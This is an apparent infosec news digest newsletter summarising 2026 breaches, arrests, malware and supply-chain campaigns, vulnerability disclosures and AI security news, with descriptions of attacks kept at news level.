🛳 Carnival Corporation confirmed a data breach that exposed nearly 6 million people’s information after attackers used social engineering to access its IT systems. Security researchers and Have I Been Pwned say the leaked data includes names, birth dates, emails, locations, and loyalty program details. The ShinyHunters gang claimed responsibility, and Carnival is investigating with outside security experts.

🇳🇱 ⚽ Dutch police arrested a 35-year-old man suspected of repeatedly hacking Ajax’s computer systems. The breach exposed data on hundreds of fans and let the attacker alter tickets and stadium bans. Ajax patched the flaws and reported the incident to authorities.

🇺🇸 📡 Charter Communications says it suffered a data breach after the ShinyHunters extortion group threatened to leak stolen records. Charter claims no sensitive personal or CPNI data was exfiltrated and is notifying authorities. ShinyHunters say they accessed an employee's Microsoft Entra account and exported millions of customer records from Salesforce.

🇱🇹 Lithuania says over 600,000 national registry entries were leaked, likely by a foreign actor. Officials blocked accounts, tightened security, and the registry head resigned. Some suspect Russian involvement, but authorities have not named a country.

→ More breaches:

🇮🇷 Iran-linked MuddyWater ran an espionage campaign in early 2026 hitting at least nine organizations across four continents. The attackers used DLL side‑loading of signed binaries and Node.js/PowerShell implants to steal credentials, browser data, and stage exfiltration. Researchers say the tactics show quieter, more disciplined operations and improved operational hygiene.

🇨🇦 ⚖ A Canadian man, Ramanan Pathmanathan, was sentenced to 33 years in U.S. prison for running an eight-year sextortion scheme targeting over 145 children, some as young as six. He pleaded guilty to coercion and child pornography charges, must register as a sex offender, and will serve 10 years supervised release on top of a prior 12-year Canadian sentence. Pathmanathan used fake social media accounts to coerce victims into sexual acts on video and threatened to share recordings.

🇷🇴 ⚖ 🇺🇸 A Romanian hacker, Catalin Dragomir, was sentenced in the U.S. to 4 years and 8 months for selling access to an Oregon state network. He admitted hacking the network in 2021, selling access and data from multiple U.S. organizations, and causing over $250,000 in losses. Dragomir was arrested in Romania, extradited to the U.S., and pleaded guilty to computer fraud and identity theft.

🇮🇷 🇺🇸 🚇 Security researchers say Iranian state-backed hackers breached the Los Angeles transit system in March. An Israeli firm, Gambit Security, ties the group Ababil of Minab to Iran’s Ministry of State Security. The attack fits a pattern of Iran-linked fake "hacktivist" groups targeting infrastructure.

🇮🇹 ❌ Italian police shut down the CINEMAGOAL piracy app that stole streaming auth codes to give users access to Netflix, Disney+, Spotify and more. The app used stolen decryption codes from fake subscriptions and routed streams through servers in Europe, earning operators millions and costing platforms about €300 million. Authorities seized servers, identified many subscribers, issued fines, and continue investigating resellers and other accomplices.

🇳🇱 ❌ 🇷🇺 Dutch authorities seized over 800 servers and arrested two men tied to hosting companies that allegedly supported Russian cyberattacks and disinformation. Investigators say the firms routed Stark Industries’ infrastructure and helped sanctioned entities evade limits. The suspects deny wrongdoing while probes continue and services linked to the firms have been paused.

🗓️ {Cyber,Info}Sec Events — A community-maintained list of infosec conferences worldwide. Subscribe to the ICS calendar feed to get events straight into your calendar, or follow @[email protected] on Mastodon for weekly digests. Contributions and ⭐ welcome!

🇺🇸 ⚖ 🧬 California sued 23andMe for failing to protect genetic data after a 2023 breach that exposed nearly 7 million customers. The suit says the company ignored warning signs, did not require password resets or multifactor authentication, and misled the public. 23andMe previously agreed to a settlement worth up to $50 million over the breach.

→ 23andMe Failed to Stop Months-Long Hack, State Alleges

🇳🇱 🇺🇸 ☁ The Dutch government blocked the sale of Solvinity, which runs the DigiD system, to U.S. firm Kyndryl over national security and digital sovereignty concerns. Officials cited risks from U.S. laws like the Cloud Act and potential dependence on foreign tech. Kyndryl said it was disappointed while Solvinity is consulting with authorities.

⛏ Attackers are spreading GPU‑mining malware by poisoning search results and even manipulating AI chatbot recommendations. Users downloading popular utility tools get a ZIP that contains a legitimate program and a malicious DLL which installs remote access (ScreenConnect) and a hidden miner. The campaign focuses on high‑performance systems and uses stealth techniques to maximize GPU mining yield.

🎣 💬 Hackers are sending fake Signal Support messages to trick users into revealing their recovery keys for encrypted backups. If stolen, those keys could let attackers access old chats, photos, and documents. Signal warns it will never ask for recovery keys, PINs, or registration codes.

🎠 📲 BTMOB is an Android remote access trojan that can steal data and fully take over devices — It’s sold as an easy-to-use kit and spread via phishing, fake app stores, and social media. ESET warns it’s evolving fast and mainly seen in Latin America but can spread further.

❌ CrowdStrike, with help from Google and Shadowserver, dismantled the Glassworm botnet by taking down four attacker-controlled servers. Glassworm had infected hundreds of open-source projects and abused developer tools to spread malware and steal data. The takedown disrupted the attackers’ infrastructure and aimed to slow future supply-chain attacks.

🇰🇵 Researchers say North Korea-linked Lazarus Group is using a memory-only RAT called RemotePE to target financial and crypto firms. RemotePE is loaded in stages by DPAPILoader and RemotePELoader and runs entirely in memory to avoid detection. The toolset is stealthy, under active development since 2023, and likely used for long-term spying and high-value theft.

🥷 Attackers hijacked Laravel Lang Git tags to distribute malicious Composer packages without changing the original source. The injected code downloaded a cross-platform credential stealer that harvests keys, tokens, passwords, and browser data. Developers should check versions, rotate credentials, and scan for signs of compromise.

→ Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects

🔙 🚪A supply chain attack called Megalodon infected over 5,500 GitHub repositories with malicious commits that added or replaced GitHub Actions workflows. The malware stole many secrets — tokens, cloud credentials, SSH keys, and CI environment variables. The attack ran in a six-hour window and can trigger dormant backdoors via GitHub tokens.

🇮🇷 🔙 🚪Iran-linked group Nimbus Manticore used phishing, fake meeting invites, and SEO-poisoned sites to spread new backdoors called MiniJunk V2 and MiniFast. Check Point and Unit 42 say MiniFast shows signs of AI-assisted coding and gives long-term remote access and data exfiltration. The attacks targeted aviation, software, energy, and other sectors across the U.S., Europe, and the Middle East, ramping up after the February 2026 conflict.

🔐 IBM and Red Hat are investing $5 billion in Project Lightwell to secure open source software used by businesses. The project uses artificial intelligence to find and fix security problems in open source code. Many big banks and companies will take part to help protect important digital systems.

🇬🇧 🔫 The head of Britain’s GCHQ warned that AI is an “unstoppable force” that can be weaponized in cyberspace. She said AI is reshaping offense and defense, and agencies must rebuild cybersecurity around agentic AI. She also warned that China and Russia are using AI and cyber tools to boost their power and influence.

🧩 Anthropic added 28 security and compliance integrations to Claude so companies can govern the AI like other workplace tools. The Claude Compliance API sends conversation content and activity logs to existing security platforms for monitoring and policy enforcement. Supported vendors include CrowdStrike, Microsoft, Palo Alto Networks, Okta, Datadog, IBM and many others.

→ Anthropic Releases New Claude Sandbox, Security Guidance Plugin

🍎 🔐 Apple open-sourced its quantum-resistant encryption code and the formal verification tools used to prove the code correct. The release includes ML-KEM and ML-DSA in Apple’s corecrypto library, used on billions of devices, plus a Cryptol-to-Isabelle translator and verification documentation. Apple says it combined formal proofs with conventional testing to catch subtle bugs and boost real-world security.

➝ From the Patching Department:

🔎 A federal audit found NIST has mismanaged the National Vulnerability Database, causing a large backlog and poor planning. Analysts spend too much time on duplicate or unnecessary work, and NIST and CISA sometimes repeat each other’s efforts. The inspector general urged clearer plans, better coordination, and improved communication, and NIST agreed to fix the problems.

🩹 Security researchers found five linked bugs in Zapier that could have let an attacker control millions of user accounts. The chain began with a free account and ended with code that could act inside users’ browsers to run automations. Zapier fixed the issues after disclosure and says there is no evidence the flaws were exploited.

💥 Attackers exploited a critical FortiClient EMS flaw (CVE-2026-35616) to push a fake update that ran malicious PowerShell on managed endpoints. The payload stole browser data and saved it locally, while a PowerShell script exfiltrated the stolen data to an attacker server. Fortinet patched the vulnerability in FortiClient EMS 7.4.7 and later.

🔓 A four-year bug in Gitea’s container registry (CVE-2026-27771) let anyone pull images marked private without authentication. NoScope found about 31,750 of ~34,000 internet-facing Gitea instances were likely vulnerable, including ~4,000 production systems. Update to Gitea 1.26.2 or require authentication for registry access immediately.

🤖 Anthropic’s Claude Mythos model flagged over 23,000 potential vulnerabilities across more than 1,000 open-source projects — External reviews confirmed 1,726 issues so far, including over 1,000 rated high or critical, and Anthropic expects thousands more confirmations as scans continue. The company is sharing findings with vendors, has started patching some flaws, and plans to expand access while adding safeguards.

💥 A patched SQL injection bug in the Ghost CMS (CVE-2026-26980) has been widely exploited to hack over 700 sites. Attackers stole Admin API keys to inject malicious JavaScript and alter site content. Victims include big organizations and many personal blogs, and many owners did not respond to notifications.

⚽ The 2026 World Cup faces high cyber risk from criminal fraud, hacktivist DDoS/defacement, and state-linked disruptive or destructive operations. Fans, hospitality providers, ticketing/FanID systems, and host-city utilities are prime targets. Organizers should pre-coordinate multi-jurisdictional defenses, audit OT and exposed services, and run realistic incident exercises before kickoff.

Follow me on Mastodon for quick daily updates and bite-sized content.

Prefer using an RSS feed? Add Infosec MASHUP to your feed here.

Enjoying our newsletter? Forward it to a colleague—
it’s one of the best ways to support us.

Thanks for reading today’s newsletter, and if you're enjoying it and want to support my work, you can buy me a coffee ☕ over at https://www.buymeacoffee.com/0x58

See you next time!

-X.